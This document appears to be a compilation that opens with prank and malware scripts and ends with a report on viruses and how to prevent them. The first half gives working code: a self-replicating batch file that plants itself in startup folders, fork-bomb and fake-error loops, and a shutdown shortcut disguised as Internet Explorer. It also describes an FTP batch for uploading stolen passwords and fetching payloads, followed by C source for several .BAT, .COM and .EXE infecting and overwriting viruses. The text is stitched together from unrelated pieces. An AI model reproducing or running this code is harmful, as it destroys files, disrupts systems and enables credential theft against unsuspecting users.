wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"
Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.
@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
:Please only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer ;)
:theend
Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\
Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.
Code:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START
A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
How to make a shutdown file and disguise it as something else!
This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...
How to make a shutdown file and disguise it as something else (internet, etc.)
Step 1: Right click on your desktop or wherever you want to make this shutdown file
Step 2: look for new, then shortcut
Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down
Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer
Step 4: Right click on the file you just made and goto properties
Step 5: hit change icon. (This could be under the advanced tab)
Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok
Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.
Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!
NOTE:- This can easily be stopped by typing shutdown -a in run...
OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.
First for example were gonna try upload a file called Test.txt to our server
Upload.bat
ftp -n -i -s:MyUploadFiles.ftp
First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.
Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.
open your-host
user username.spam.com password
ASCII
send test.txt
BI
This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.
Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?
Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.
Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
VIRUS CODES IN “ C “ :-
BATCH & COM VIRUS
#include
#include
#include
#include
struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir); /* Save the old directory */
Pick_A_Dir(); /* Find a new directory to */
Infect_Directory(); /* infect and infect it. */
chdir(old_dir); /* Return to old directory */
return 0;
}
Pick_A_Dir()
{
int done;
chdir(".."); /* First, Go out a DIR. */
done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
/* root and DOS */
if (done)
{
chdir("\\");
done=findfirst("*.BAT",&ffblk,0);
if (done) chdir("\\DOS\\");
}
return 0;
}
Infect_Directory()
{
int done;
done = findfirst("*.BAT",&ffblk,0);
while (!done) /* Find all .BAT files */
{ /* and add code to run */
Do_Batch(); /* BAT&COM if not */
done = findnext(&ffblk); /* already there */
}
if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */
{Copy_Virus();} /* not exist, then */
return 0; /* copy it into dir.*/
}
Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];
Get_Path(vpath); /* Get path for adding path */
/* specifier in commands */
if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */
batch=fopen(ffblk.ff_name, "rt+");
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0; /* Terminate String */
if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
{ /* Batch is */
fseek(batch, 0, SEEK_END); /* infected.*/
fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
} /*^- Add command */
/* to batch */
fclose(batch);
return 0;
}
Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024]; /* Copy the virus to */
/* new directory */
old_virus=fopen(_argv[0],"rb");
new_virus=fopen("BAT&COM.COM","wb");
write_length=1024;
while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}
Get_Path(char *path)
{
strcpy(path, "A:\\");
path[0] ='A' + getdisk(); /* Returns current path */
getcurdir(0, path+3);
return 0;
}
- - - -----------------End of Code------------------------ - - -
BLACK WOLF VIRUS
/* It will infect all .COM files in the current directory */
#include
#include
#include
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < style="mso-spacerun:yes"> */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}
OVERWRITE VIRUS CODE
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode
for(;fread(buffer,512,1,virus)==1;)
fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s
",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact
sudhir sharma; sudhir0786@gmail.com ");
REPLICATION VIRUS
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
4.2 VIRUSES THAT GOES FURTHEST
Love Bug
ØVBS/Love Let-A
ØBest known & pretends to be a LL
ØFirst seen : May 2000
ØOrigin : Philippines
ØTrigger : On initial infection
ØEffect :E-mail with subject LL,distribute via MS-outlook, Steal user info, overwrites cert files
Kakworm
ØVBS/Kakworm
ØBy viewing infected mails
ØFirst seen : June 1998
ØOrigin : written by Chen Ing Hau of Taiwan
ØTrigger : On initial infection or 1st of any month
ØEffect :Arrives embedded in mail, infects when open, affects MS-outlook i.e. virus code is automatically included with all outgoing mails, on 1st of any month –displays “Kagou-Anti_Kro$oft says not today”& shuts down
Melissa
ØWM97/Melissa-Word 97 macro virus
ØUses psychological subtlety
ØFirst seen : March 1999
ØOrigin : A 31 yr old US programmer, David .L.Smith
ØTrigger : On initial infection
ØEffect :Sends message to first fifty in all address books ,Attaches infected document
CIH (Chernobyl)
ØW95/CIH-10xx-parasitic virus, runs on Win-95
ØFirst virus to damage hardware
ØFirst seen : June 1998
ØOrigin :Written by Chen Ing Hau of Taiwan
ØTrigger :April-26th,June 26th or 26th of any month
ØEffect :Overwrites HD,overwrites BIOS, needs BIOS chip replacement
PREVENTING VIRUSES
5. PREVENTING VIRUSES
The simple measures to avoid being infected or to deal with viruses if you are infected are ……
§ Make users aware of the risks: Tell everyone in the organization that they are at risk if they swap floppy disks, download files from websites or open email attachments.
§ Install anti-virus software and update it regularly: Anti-virus programs can detect and often disinfect viruses. If the software offers on-access virus checking, use it. On-access checking protects users by denying access to any file that is infected
§ Keep backups of all your data: Make sure you have backups of all data and software, including operating systems. If you are affected by a virus, you can replace your files and programs with clean copies.
SOURCES OF VIRUSES
6. SOURCES OF VIRUSES
6.1.E mail
Email is now the biggest source of viruses. As long as viruses were transferred by floppy disk, they spread slowly. Companies could ban disks or insist on having them virus checked. Email has changed all that. Conventional viruses can spread faster and new kinds of virus exploit the workings of email programs. Viruses such as Kakworm and Bubbleboy can infect users when they read email. They look like any other message but contain a hidden script that runs as soon as you open the email, or even look at it in the review pane (as long as you are using Outlook with the right version of Internet Explorer). This script can change system settings and send the virus to other users via email.
The greatest security risk at present isn’t email itself but email attachments. Any program, document or spreadsheet that you receive by email could carry a virus; launching such an attachment can infect your computer.
Viruses that spread automatically by email
The most successful viruses today are those that spread themselves automatically by email. Typically, these viruses depend on the user clicking on an attached document. This runs a script that uses the email program to forward infected documents to other email users. Melissa, for example, sends a message to the first fifty addresses in all address books that Microsoft Outlook can access. Other viruses send themselves to every address in the address book.
6.1.1. Email hoaxes
Email is a popular medium for hoaxes. These are bogus virus reports that urge you to forward the message to everyone you know. An email hoax can spread across networks like a virus and can cause a mail
overload. The difference is that the hoax doesn’t need virus code; it simply depends on users’ credulity
6.1.2. What is spam?
Spam is unsolicited email, often advertising get-rich quick schemes, home working jobs, loans or pornographic websites. Spam often comes with fake return information, which makes it more difficult to deal with the perpetrators. Such mail should simply be deleted.
Email interception and forgery
Email interception involves other users reading your email while it is in transit. You can protect yourself with email encryption. Email forgery means sending mail with a forged sender’s address or tampering with contents. by using digital signatures.
6.1.3. How to stop email virus
§ Have a strict policy about email attachments: Changing your (and other users’) behavior is the simplest way to combat email threats. Don’t open any attachments, even if they come from your best friend. If you don’t know something is virus-free, treat it as if it’s infected. You should have a company policy that ALL attachments are authorized and checked with anti-virus software before being launched.
§ Use anti-virus software: Use on-access anti-virus software on the desktop and at the email gateway. Both arrangements can protect against viruses sent via email.
§ Block unwanted file types at the gateway: Viruses often use file types such as VBS, SHS, EXE, SCR, CHM and BAT to spread. It is unlikely that our organization will ever need to receive files of these types from outside, so block them at the email gateway.
§ Block files with double extensions at the gateway: Some viruses disguise the fact that they are programs by using a ‘double extension’, such as .TXT.VBS, after their filename. Block such files at the email gateway.
6.2. The internet
The internet has made more information available to more people more quickly than ever before. The downside is that the internet has also made it easier for harmful computer code to reach office and home computers.
Click and infect?
The internet has increased the risk of infection. Ten years ago, most viruses spread via floppy disks. Spreading in this way was slow and depended on users making a conscious effort to run new programs. If the virus had side-effects that were too obvious, it was unlikely to affect many users. But internet caused the widespread of viruses.
Can I be infected just by visiting websites?
Visiting a website is less hazardous than opening unknown programs or documents. There are risks, though. The threat depends on the types of code used in the site and the security measures taken by service providers and by the user. The main types of codes are…..
6.2.1.Different types of codes used in the websites
HTML
Web pages are written in HTML (Hypertext Markup Language). This language lets web authors format their text and create links to graphics and to other pages. HTML code itself can’t carry a virus. However, web pages can contain code that launches applications or opens documents automatically. This introduces the risk of launching an infected item.
ActiveX
ActiveX is a Microsoft technology for web developers used only on computers running Windows.ActiveX applets, used to create visual effects on web pages, have full access to resources on your computer, which makes them a potential threat. However, digital signatures, which prove that an applet is authentic and hasn’t been tampered with, do provide limited security.
Java
People sometimes worry unduly about Java viruses on the internet. They do so because they confuse Java applets, which are used to create effects on web pages, with Java applications and Java scripts. Applets are generally safe. They are run by the browser in a secure environment known as a ‘sandbox’. Even if a security flaw lets an applet escape, a malicious applet cannot spread easily. Applets usually flow from a server to users’ computers, not from one user to another (you tell your friends to visit a site, rather than sending them a copy of an applet). In addition, applets are not saved on the hard disk, except in the web cache. If you do encounter a harmful applet, it is most likely to be a Trojan, i.e. a malicious program pretending to be legitimate software. Java applications are simply programs written in the Java language. Like any other program, they can carry viruses. You should treat them with the same caution as you would use with other programs. Java script is script embedded in HTML code in web pages. Like any other script, it can carry out operations automatically, which carries risks. You can disable active scripts
JScript:
The Microsoft version of JavaScript. It is about as flexible and expandable (and unsafe) as Visual Basic Script. JScript is found in *.JS files or on web pages.
VBS script
VBS (Visual Basic Script) can run as soon as a page is viewed, depending on the browser used. You don’t have to do anything to launch it. This script is used by email worms such as Kakworm and Bubbleboy, but can just as well be run from web pages.
IRC scripts
Internet Relay Chat is a chat system for the Internet Chat systems can be scripted to perform certain tasks automatically, like sending a greeting to someone who just joined the chat room. However, the scripts also support sending of files, and many worms and viruses spread over IRC. Known IRC programs that have been exploited are the popular mIRC, pIRCH and VIRC clients.
Are cookies a risk?
Cookies do not pose a direct threat to your computer or the data on it. However, they do threaten your confidentiality: a cookie enables a website to remember your details and keep track of your visits to the site. If you prefer to remain anonymous, you should use the security settings on your browser to disable cookies.
6.2.2. Attacks on web servers
End-users aren’t the only ones at risk on the internet. Some hackers target the web servers which make websites available. A common form of attack involves sending so many requests to a web server that it slows down or crashes. When this happens, genuine users can no longer gain access to the websites hosted by the server. CGI (Common Gateway Interface) scripts are another weak point. These scripts run on web servers to handle search engines, accept input from forms, and so forth. Hackers can exploit poorly-implemented CGI scripts to take control of a server
6.2.3.Safety on the net
If you want to use the internet safely, you should do the following:
§ Have a separate network for internet machines: Maintain separate networks for those computers that are connected to the internet and those that are not. Doing so reduces the risk that users will download infected files and spread viruses on your main network.
§ Use firewalls and/or routers: A firewall admits only authorized traffic to your organization. A router controls the flow of packets of information from the internet.
§ Configure your internet browser for security: Disable Java or ActiveX applets, cookies, etc., or ask to be warned that such code is running. For example, in Microsoft Internet Explorer, select
Tools/Internet Options|Security| Custom Level and select the security
settings you want
VIRUSES ON DIFFERENT OPERATING SYSTEM
7. VIRUSES ON DIFFERENT OPERATING SYSTEMS
a)MS-DOS :
Since the macro viruses that we have seen to date infect data files generated from and read by Windows applications, macro viruses are not a problem on MS-DOS-only machines. Traditional file viruses and boot viruses prosper in MS-DOS machines because MS-DOS has no inherent security features. Viruses, therefore, have free rein to infect memory, and program files
b) Windows :
Macro viruses have been written to target Windows applications, and therefore the presence of Windows is required. Combining the wide acceptance of Windows with the fact that macro viruses infect data files rather than program files (see “Macro virus” on page 19) has led to six macro viruses being amongst the ten most common viruses overall. The actual booting process on a Windows machine is no different than on a DOS-only machine. Therefore, boot viruses have not been hindered by Windows, and they continue to propagate by infecting hard drives, going memory resident, and then infecting floppy.
c)Windows 95/98/ME
Windows and DOS, Windows 95/98 is marketed as having built-in security features. Unfortunately, such features are not robust enough to safeguard Windows 95/98 against viruses. In fact, the first virus written especially to target Windows 95 (the Boza virus) emerged late in 1995. Furthermore, Windows 95’s workgroup networking environment has no file-level protection and therefore can potentially lead to increases in virus spreading. After the rather primitive Boza virus, the Windows 95/98 and Windows NT/2000 viruses have increased in numbers and complexity. Like in the DOS environment, the first viruses were amateurish. Some of the viruses under Windows 95/98 and Windows NT/2000 spread by active use of the network protocol. DOS file viruses can easily spread on a Windows 95/98 machine because DOS program files’ only limitation under Windows 95/98 is that they cannot write directly to the hard drive. Since the Windows 95/98 boot process is the same as a DOS only or Windows machine (up to a certain point), boot viruses are able to infect hard drives of Windows 95/98 machines. When Windows 95/98 loads, however, boot viruses are often disabled and not allowed to propagate.
d) 40Windows NT/2000/XP
Windows NT supports DOS applications, Windows applications, and native Windows NT applications. like Windows 95/98, Windows NT is backwards compatible, and to some extent with DOS and Windows. Despite the fact that NT’s security features are more robust than Windows 95/98’s, file viruses can still infect and propagate within Windows NT. As with Windows 95/98, Windows NT supports applications that contain macro programming languages, making NT as vulnerable to macro viruses as old Windows machines. Because Windows NT machines boot the same way that DOS machines do (up to the point at which NT takes over), boot viruses are able to infect NT hard drives. However, when these boot viruses attempt to go memory resident, they will be stopped by NT and therefore be unable to infect floppies.
e) Window Vista
The first computer virus targeting the Windows Vista system broke out during the weekend and five variations appeared online yesterday, Internet security firm said.
The worm ANI, which forces infected computers to download spy programs and Trojans, makes use of a Windows Vista loophole. And the virus can't be prevented as Microsoft won't launch a fix until tomorrow, said Rising Co Ltd, a Beijing-based anti-virus-firm.
The worm is the first to target the new Windows operating system, and Rising has received "several hundred" reports about it, according to Lu Lan, Rising's marketing official.
f) Linux
Currently there are under 100 native Linux viruses known but in many organizations the fact that a Linux viruses exists is enough reason to install and use Linux antivirus protection on Linux desktops and servers. Additionaly users of StarOffice and OpenOffice.org have the ability to open and view Microsoft Office documents that may contain viruses. These viruses may not infect the Linux computer but the user can easily attach and send these infected documents unknowingly to someone else and that is a serious problem.
As system administrators move to Linux files servers they have a real problem to deal with since the Linux file server can store Windows-based viruses. Windows-based viruses can write to a Linux/Samba network share as easily as they can on a Microsoft Windows based network. System administrators must protect the Linux server from storing these viruses. The only way is through active antivirus defense on the Linux server itself. Our Vexira Antivirus for Linux, as an example, detects not only Linux-based viruses but also Windows and DOS-based as well, I think the current number of malicious or potentially malicious applications (viruses, trojans, worms, etc...) we detect is above 74,000 now.
ANTIVIRUS SOFTWARE
8. ANTIVIRUS SOFTWARE
Anti-virus software can detect viruses, prevent access to infected files and often eliminate the infection. They are….
a. Scanners
Virus scanners can detect, and often disinfect, the viruses known at the time the scanner is released. Scanners are easily the most popular form of anti-virus software but they have to be updated regularly to recognize new viruses. There are on-demand and on-access scanners. Many anti-virus packages offer both. On-demand scanners let you start or schedule a scan of specific files or drives. On-access scanners stay active on your machine whenever you are using it. They check files as you try to open or run them.
b.Check summers
Checksummers are programs that can tell when files have been changed. If a virus infects a program or document, changing it in the process, the checksummer should report the change. The good thing about checksummers is that they do not need to know anything about a virus in order to detect its presence. For that reason, checksummers do not need regular updating. The bad thing about checksummers is that they cannot tell the difference between a virus and a legitimate change, so false alarms are likely. Checksummers have particular problems with documents, which can change frequently. In addition, checksummers can only alert you after infection has taken place, they cannot identify the virus, and they cannot provide disinfection.
c.Heuristics
Heuristic software tries to detect viruses – both known and unknown – by using general rules about what viruses look like. Unlike conventional scanners, this software doesn’t rely on frequent updates about all known viruses. However, if a new kind of virus emerges, the software will not recognize it and will need to be updated or replaced. Heuristics can be prone to false alarms.
MOBILE PHONES AND PALMTOPS
9. MOBILE PHONES AND PALMTOPS
At the time of writing, there is no virus that infects mobile phones, despite media stories and hoaxes. There have been viruses that send messages to phones. For example, VBS/Timo-A, a worm that spreads itself by email, also uses the modem to send text (SMS) messages to selected mobile numbers. The notorious Love Bug virus is also capable of forwarding text to fax machines and mobiles. However, these viruses can’t infect or harm the mobile phone. You can already access internet-like sites and services on the new generation mobiles and the technology is developing fast. But as it becomes easier to transfer data – even on the move – the risk is that new security threats will emerge too.
9.1 WAP phones and viruses
WAP provides internet-type information and services for mobile phones and organizers. It is based on the same model as web communications, i.e. a central server delivers code that is run by a browser on your phone. So, at the moment, the possibilities for viruses are very limited. A virus could infect the server itself, but the chances for it to spread or to have an effect on users would be minimal. First, there is nowhere on a WAP system that a virus can copy itself or survive. Unlike a PC, a WAP phone does not store applications. The phone downloads the code it needs and keeps no copy, except temporarily in the browser cache. Second, a virus cannot yet spread from one user to another because there is no communication between client phones.
9.2 Bluetooth-Bugs
Bluetooth is a standard for low-power radio data communication over very short distances. Computers, mobiles, fax machines and even domestic appliances, like video recorders, can use Bluetooth to discover what services are provided by other nearby mobile devices and establish transparent links with them. Software that utilizes Bluetooth is currently emerging The worry is that an unauthorized user, or malicious code, could exploit Bluetooth to interfere with these services.
9.3. Palmtop computers, PDAs-can they be infected by computer viruses?
Palmtop computers or personal digital assistants (PDAs) are likely to provide new opportunities or viruses in the very near future. Palmtops or PDAs run specially written or scaled-down operating systems – such as EPOC, PalmOS and PocketPC (formerly Windows CE). Such systems will eventually be able to use versions of popular desktop applications, making them vulnerable to malicious code in the same way as desktop machines. In early 2001, there were already viruses that affect the Palm system. Palmtops are also regularly connected to home or office PCs to synchronise the data on the two machines (e.g. address book information or calendars). Such data synchronisation could allow viruses to spread easily. No-one yet knows which will be more successful in the future: mobile computers or smart mobile phones. Whichever it is, the security risks will increase as mobile computers become better at communicating.
There is a virus called Palm/Phage, which is able to infect Palm OS, but it is not in the wild and poses little threat. Palm/Liberty-A-Trojan, that infects Palm OS. It deletes Palm OS applications, but possesses only less risk
9.4. Some mobile phone viruses…
§ VBS/Timo-A,Love Bug-Uses modem to send SMS to mobile phones
§ CABIR-Install file with .SIS extension, affects symbion OS, corrupts s/m files
§ aka ACE-? and UNAVAILABLE- This virus will erase all IMEI and IMSI information from both the phone and the SIM card, which will make the phone unable to connect with the telephone network.The user will have to buy a new phone. This information has been confirmed by both Motorola and Nokia.There are over 3 million mobile phones being infected by this virus in USA now.
§ Timfonica- The"Timofonica" virus was designed to send prank messages to cell phones on the Telefonica cellular network, which operates in Spain. The virus worked like this: victims would receive it as an e-mail attachment on their home or work computers. When users opened the infected attachments, the virus, plus a message critical of Telefonica, would be sent to every e-mail address in their address books. The virus would also trigger the each victim's computer to send a text message to a randomly-selected cell phone on Telefonica's network. Timofonica did not harm cell phones any more than a wrong number call damages any phone.
9.5. Mobile phone virus-precautions
§ Scanning at a gateway or during data transfer: In the near future, the best way to protect mobile devices may be to check data when you transfer it to or from them.For mobile phones, for example, the WAP gateway might be
a good place to install virus protection. All communications pass through this gateway in unencrypted form, so there would be an ideal opportunity for virus scanning. For palmtop computers, you could use virus protection when the palmtop is synchronizing data with a conventional PC.
§ Virus scanning on the mobile device: As mobile devices become more interconnected, it will become difficult to police data transfer at a central point. The solution will be to put anti-virus software on each device – once they have sufficient processing power and memory.
§ Enable Bluetooth only when it is needed: Disable Bluetooth, if it is not in use. This will prevent the mobile being affected by virus and will also make the battery last longer as Bluetooth consumes lot of power. But if you have to keep it ON, then at least keep it in invisible mode
§ Don’t install unexpected applications: If your Bluetooth is ON and you are receiving a file, be Alert. Accept only what you expect. Accept only the files you are expecting.
§ Never download cell phone applications from file sharing networks: It is strongly recommended to scan all the cell applications-even the one downloaded from official web site- with antivirus software on your computer. Some of them do detect cell phone viruses.
STEPS TO SAFER COMPUTING
10. STEPS TO SAFER COMPUTING
a. Don’t use documents in .doc and .xls format: Save your Word documents in RTF (Rich Text Format) and your Excel spreadsheets as CSV (Comma Separated Values) files. These formats don’t support macros, so they cannot spread macro viruses, which are by far the commonest virus threat. Tell other people to supply you with RTF and CSV files. Some macro viruses intercept File/SaveAs RTF and save the file with an RTF extension but DOC format. To be absolutely safe, use text-only files. Don’t launch unsolicited programs or documents If you don’t know that something is virus-free, assume it isn’t
b. Forward warnings to one authorized person: only Hoaxes are as big a problem as viruses themselves. Tell users not to forward virus warnings to their friends, colleagues or everyone in their address book. Have a company policy that all warnings go to one named person or department only.
c. Block files with double extensions at the gateway: Some viruses disguise the fact that they are programs by using a ‘double extension’, such as .TXT.VBS, after their filename. At first glance a file like LOVE-LETTER-FORYOU. TXT.VBS or ANNAKOURNIKOVA.JPG.VBS may seem tobe a harmless text file or a graphic. Any file with double extensions should be blocked at the email gateway.
d. Block unwanted file types at the email gateway: Many viruses now use VBS (Visual Basic Script) and Windows scrap object (SHS) file types to spread. It is unlikely that your organization needs to receive these file types from outside, so block them at the email gateway.
e. Change your computer’s boot up sequence: Most computers try to boot from floppy disk (the A: drive) first. Your IT staff should change the CMOS settings so that the computer boots from the hard disk by default. Then, even if an infected floppy is left in the computer, it cannot be infected by a boot sector virus. If you need to boot from floppy at any time, you can have the settings changed back.
f. Write-protect floppies before giving to other users :A write-protected floppy cannot be infected.
g. Subscribe to an email alert service: An alert service can warn you about new viruses and offer virus identities that will enable your anti-virus software to detect them. Sophos has a free alert service.
h. Make regular backups of all programs and data: If you are infected with a virus, you will be able to restore any lost programs and data.
10 WORST COMPUTER VIRUSES
11. 10 Worst Computer Virus :
Worst computer Virus 10 : Melissa
In the spring of 1999, a man named David L. Smith created a computer virus based on a Microsoft Word macro. He built the virus so that it could spread through e-mail messages. Smith named the virus "Melissa," saying that he named it after an exotic dancer from Florida [source: CNN].
Daniel Hulshizer/AFP/Getty Images
Rather than shaking its moneymaker, the Melissa computer virus tempts recipients into opening a document with an e-mail message like "Here is that document you asked for, don't show it to anybody else." Once activated, the virus replicates itself and sends itself out to the top 50 people in the recipient's e-mail address book.
The virus spread rapidly after Smith unleashed it on the world. The United States federal government became very interested in Smith's work -- according to statements made by FBI officials to Congress, the Melissa virus "wreaked havoc on government and private sector networks" [source: FBI]. The increase in e-mail traffic forced some companies to discontinue e-mail programs until the virus was contained.
After a lengthy trial process, Smith lost his case and received a 20-month jail sentence. The court also fined Smith $5,000 and forbade him from accessing computer networks without court authorization [source: BBC]. Ultimately, the Melissa virus didn't cripple the Internet, but it was one of the first computer viruses to get the public's attention.
Flavors of Viruses
In this article, we'll look at several different kinds of computer viruses. Here's a quick guide to what we'll see:
The general term computer virus usually covers programs that modify how a computer works (including damaging the computer) and can self-replicate. A true computer virus requires a host program to run properly -- Melissa used a Word document.
A worm, on the other hand, doesn't require a host program. It's an application that can replicate itself and send itself through computer networks.
Trojan horses are programs that claim to do one thing but really do another. Some might damage a victim's hard drive. Others can create a backdoor, allowing a remote user to access the victim's computer system.
Next, we'll look at a virus that had a sweet name but a nasty effect on its victims.
Worst Computer Virus 9: “ ILOVEYOU ”
A year after the Melissa virus hit the Internet, a digital menace emerged from the Philippines. Unlike the Melissa virus, this threat came in the form of a worm -- it was a standalone program capable of replicating itself. It bore the name ILOVEYOU.
Robyn Beck/AFP/Getty Images
The ILOVEYOU virus initially traveled the Internet by e-mail, just like the Melissa virus. The subject of the e-mail said that the message was a love letter from a secret admirer. An attachment in the e-mail was what caused all the trouble. The original worm had the file name of LOVE-LETTER-FOR-YOU.TXT.vbs. The vbs extension pointed to the language the hacker used to create the worm: Visual Basic Scripting [source: McAfee].
